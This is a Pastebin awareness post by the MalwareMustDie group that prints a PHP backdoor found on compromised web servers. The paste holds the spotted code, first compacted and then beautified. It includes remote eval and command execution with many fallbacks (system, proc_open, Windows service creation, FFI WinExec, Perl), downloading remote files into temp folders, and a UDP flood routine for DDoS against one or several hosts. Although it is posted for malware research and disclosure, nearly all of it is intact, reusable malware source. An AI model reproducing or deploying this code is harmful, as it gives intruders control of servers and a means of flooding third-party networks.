daily pastebin goal
32%
SHARE
TWEET

qqq.inc.php PHP Hacks aimed DDoS & Windows Remote Shell

MalwareMustDie Jan 5th, 2014 578 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # MalwareMustDie Awareness Post
  2. # Case: Webapp/PHP (Read: Web Hacking)
  3. # Target OS: Windows (with PHP and/or Perl)
  4. # Interface: PHP (Flaw), Perl (Shell), FTP (Hacks) Remote Windows Executable Environment/commands
  5. # Path: /qqq.inc.php
  6. # UDP Flood, Services Remote Control, API Remote Shell
  7. # Credit: Malware Hunter @malpush (twitter)
  8.  
  9. // Spotted base code (plain or after obfuscation)
  10.  
  11. 1) { $evaled = ""; for($i = 1; $i < count($command); $i++) $evaled .= $command[$i];
  12. if($lasteval != $evaled) { eval($evaled); $lasteval = $evaled; } } if($command[0] ==
  13.  "eval" && count($command) > 1) { $evaled = ""; for($i = 1; $i < count($command); $i
  14. ++) $evaled .= $command[$i]; eval($evaled); } if($command[0] == "execonce" && count(
  15. $command) > 1) { $toexec = ""; for($i = 1; $i < count($command); $i++) $toexec .= $c
  16. ommand[$i]; $toexec = str_replace("%LOLTMPLOL%", whereistmP(), $toexec); if($lastexe
  17. c != $toexec) { Exe($toexec); $lastexec = $toexec; } } if($command[0] == "exec" && c
  18. ount($command) > 1) { $toexec = ""; for($i = 1; $i < count($command); $i++) $toexec
  19. .= $command[$i]; $toexec = str_replace("%LOLTMPLOL%", whereistmP(), $toexec); Exe($t
  20. oexec); } if($command[0] == "downonce" && count($command) == 3) { $command[1] = str_
  21. replace("%LOLTMPLOL%", whereistmP(), $command[1]); $command[2] = str_replace("%LOLTM
  22. PLOL%", whereistmP(), $command[2]); $todown = ""; for($i = 1; $i < count($command);
  23. $i++) $todown .= $command[$i]; if($lastdown != $todown) { $content = @file_get_conte
  24. nts($command[1]); file_put_contents($command[2], $content); $lastdown = $todown; } }
  25.  if($command[0] == "down" && count($command) == 3) { $command[1] = str_replace("%LOL
  26. TMPLOL%", whereistmP(), $command[1]); $command[2] = str_replace("%LOLTMPLOL%", where
  27. istmP(), $command[2]); $todown = ""; for($i = 1; $i < count($command); $i++) $todown
  28.  .= $command[$i]; $content = @file_get_contents($command[1]); file_put_contents($com
  29. mand[2], $content); } $end = time(); $left = $time - ($end - $start); if($left > 0)
  30. sleep($left); } } function whereistmP() { $uploadtmp=ini_get('upload_tmp_dir'); $uf=
  31. getenv('USERPROFILE'); $af=getenv('ALLUSERSPROFILE'); $se=ini_get('session.save_path
  32. '); $envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP'); if(is_dir('/tmp') && is_wr
  33. itable('/tmp'))return '/tmp'; if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))retur
  34. n '/usr/tmp'; if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp'; if
  35. (is_dir($uf) && is_writable($uf))return $uf; if(is_dir($af) && is_writable($af))retu
  36. rn $af; if(is_dir($se) && is_writable($se))return $se; if(is_dir($uploadtmp) && is_w
  37. ritable($uploadtmp))return $uploadtmp; if(is_dir($envtmp) && is_writable($envtmp))re
  38. turn $envtmp; return '.'; } function srvshelL($command) { $name=whereistmP()."\\".un
  39. iqid('NJ'); $n=uniqid('NJ'); $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system3
  40. 2\\cmd.exe':$_SERVER['ComSpec']; win32_create_service(array('service'=>$n,'display'=
  41. >$n,'path'=>$cmd,'params'=>"/c $command >\"$name\"")); win32_start_service($n); win3
  42. 2_stop_service($n); win32_delete_service($n); while(!file_exists($name))sleep(1); $e
  43. xec=file_get_contents($name); unlink($name); return $exec; } function ffishelL($comm
  44. and) { $name=whereistmP()."\\".uniqid('NJ'); $api=new ffi("[lib='kernel32.dll'] int
  45. WinExec(char *APP,int SW);"); $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0)
  46. ; while(!file_exists($name))sleep(1); $exec=file_get_contents($name); unlink($name);
  47.  return $exec; } function comshelL($command,$ws) { $exec=$ws->exec("cmd.exe /c $comm
  48. and"); $so=$exec->StdOut(); return $so->ReadAll(); } function perlshelL($command) {
  49. $perl=new perl(); ob_start(); $perl->eval("system(\"$command\")"); $exec=ob_get_cont
  50. ents(); ob_end_clean(); return $exec; } function Exe($command) { $exec=$output=''; $
  51. dep[]=array('pipe','r');$dep[]=array('pipe','w'); if(function_exists('passthru')){ob
  52. _start();@passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();} els
  53. eif(function_exists('system')){$tmp=ob_get_contents();ob_clean();@system($command);$
  54. output=ob_get_contents();ob_clean();$exec=$tmp;} elseif(function_exists('exec')){@ex
  55. ec($command,$output);$output=join("\n",$output);$exec=$output;} elseif(function_exis
  56. ts('shell_exec'))$exec=@shell_exec($command); elseif(function_exists('popen')){$outp
  57. ut=@popen($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);
  58. } elseif(function_exists('proc_open')){$res=@proc_open($command,$dep,$pipes);while(!
  59. feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($re
  60. s);} elseif(function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3))
  61.  === 'WIN')$exec=winshelL($command); elseif(function_exists('win32_create_service')
  62. && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=srvshelL($command); elseif(exten
  63. sion_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=ffishelL($com
  64. mand); elseif(extension_loaded('perl'))$exec=perlshelL($command); return $exec; } fu
  65. nction udpflood($host,$port,$time,$packetsize) { $packet = ""; for($i=0;$i<$packetsi
  66. ze;$i++) { $packet .= chr(rand(1,256)); } $end = time() + $time; $multitarget = fals
  67. e; if(strpos($host, ",") !== FALSE) { $multitarget = true; $host = explode(",", $hos
  68. t); } $i = 0; if($multitarget) { $fp = array(); foreach($host as $hostt) $fp[] = fso
  69. ckopen("udp://".$hostt,$port,$e,$s,5); $count = count($host); while(true) { fwrite($
  70. fp[$i % $count],$packet); fflush($fp[$i % $count]); if($i % 100 == 0) { if($end < ti
  71. me()) break; } $i++; } foreach($fp as $fpp) fclose($fpp); } else { $fp = fsockopen("
  72. udp://".$host,$port,$e,$s,5); while(true) { fwrite($fp,$packet); fflush($fp); if($i
  73. % 100 == 0) { if($end < time()) break; } $i++; } fclose($fp); } $env = $i *
  74.  $packetsize; $env = $env / 1048576; $vel = $env / $time; $vel = round($vel);
  75. $env = round($env); }
  76.  
  77. // -----------------------------------------------------
  78. // Below part is the information of
  79. // some breakdown of the evil function (after beautified)
  80. // -----------------------------------------------------
  81.  
  82. // PoC Conditions used for remote controls:
  83.  
  84. elseif (function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) ===
  85. 'WIN') $exec = winshelL($command);
  86. elseif (function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) ===
  87. 'WIN') $exec = srvshelL($command);
  88. elseif (extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $exec =
  89. ffishelL($command);
  90. elseif (extension_loaded('perl')) $exec = perlshelL($command);
  91. return $exec;
  92. }
  93.  
  94. // DDoS / UDP Flooder:
  95.  
  96. function udpflood($host, $port, $time, $packetsize)
  97. {
  98. $packet = "";
  99. for ($i = 0; $i < $packetsize; $i++)
  100. {
  101. $packet.= chr(rand(1, 256));
  102. }
  103.  
  104. $end = time() + $time;
  105. $multitarget = false;
  106. if (strpos($host, ",") !== FALSE)
  107. {
  108. $multitarget = true;
  109. $host = explode(",", $host);
  110. }
  111.  
  112. $i = 0;
  113. if ($multitarget)
  114. {
  115. $fp = array();
  116. foreach($host as $hostt) $fp[] = fsockopen("udp://" . $hostt, $port, $e, $s, 5);
  117. $count = count($host);
  118. while (true)
  119. {
  120. fwrite($fp[$i % $count], $packet);
  121. fflush($fp[$i % $count]);
  122. if ($i % 100 == 0)
  123. {
  124. if ($end < time()) break;
  125. }
  126.  
  127. $i++;
  128. }
  129.  
  130. foreach($fp as $fpp) fclose($fpp);
  131. }
  132.   else
  133. {
  134. $fp = fsockopen("udp://" . $host, $port, $e, $s, 5);
  135. while (true)
  136. {
  137. fwrite($fp, $packet);
  138. fflush($fp);
  139. if ($i % 100 == 0)
  140. {
  141. if ($end < time()) break;
  142. }
  143.  
  144. $i++;
  145. }
  146.  
  147. fclose($fp);
  148. }
  149.  
  150. $env = $i * $packetsize;
  151. $env = $env / 1048576;
  152. $vel = $env / $time;
  153. $vel = round($vel);
  154. $env = round($env);
  155. }
  156.  
  157. // Remote shell..(Windows EXE)
  158.  
  159. $output = join("\n", $output);
  160. $exec = $output;
  161. }
  162. elseif (function_exists('shell_exec')) $exec = @shell_exec($command);
  163. elseif (function_exists('popen'))
  164. {
  165. $output = @popen($command, 'r');
  166. while (!feof($output))
  167. {
  168. $exec = fgets($output);
  169. }
  170.  
  171. pclose($output);
  172. }
  173. elseif (function_exists('proc_open'))
  174. {
  175. $res = @proc_open($command, $dep, $pipes);
  176. while (!feof($pipes[1]))
  177. {
  178. $line = fgets($pipes[1]);
  179. $output.= $line;
  180. }
  181.  
  182. $exec = $output;
  183. proc_close($res);
  184. }
  185. elseif (function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $exec = winshelL($command);
  186. elseif (function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $exec = srvshelL($command);
  187. elseif (extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $exec = ffishelL($command);
  188. elseif (extension_loaded('perl')) $exec = perlshelL($command);
  189. return $exec;}
  190.  
  191. // Perl Shell:
  192.  
  193.  
  194. function perlshelL($command)
  195. {
  196. $perl = new perl();
  197. ob_start();
  198. $perl->eval("system(\"$command\")");
  199. $exec = ob_get_contents();
  200. ob_end_clean();
  201. return $exec;
  202. }
  203.  
  204. // CMD Shell
  205.  
  206. function comshelL($command, $ws)
  207. {
  208. $exec = $ws->exec("cmd.exe /c $command");
  209. $so = $exec->StdOut();
  210. return $so->ReadAll();
  211. }
  212.  
  213. // ffishell
  214.  
  215. function ffishelL($command)
  216. {
  217. $name = whereistmP() . "\\" . uniqid('NJ');
  218. $api = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
  219. $res = $api->WinExec("cmd.exe /c $command >\"$name\"", 0);
  220. while (!file_exists($name)) sleep(1);
  221. $exec = file_get_contents($name);
  222. unlink($name);
  223. return $exec;
  224.  
  225. // And many more information exclussive for MMD forum members.
  226.  
  227. # MalwareMustDie!!
  228. # Reported by @unixfreaxjp | $ date
  229. Sun Jan  5 22:21:58 JST 2014
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top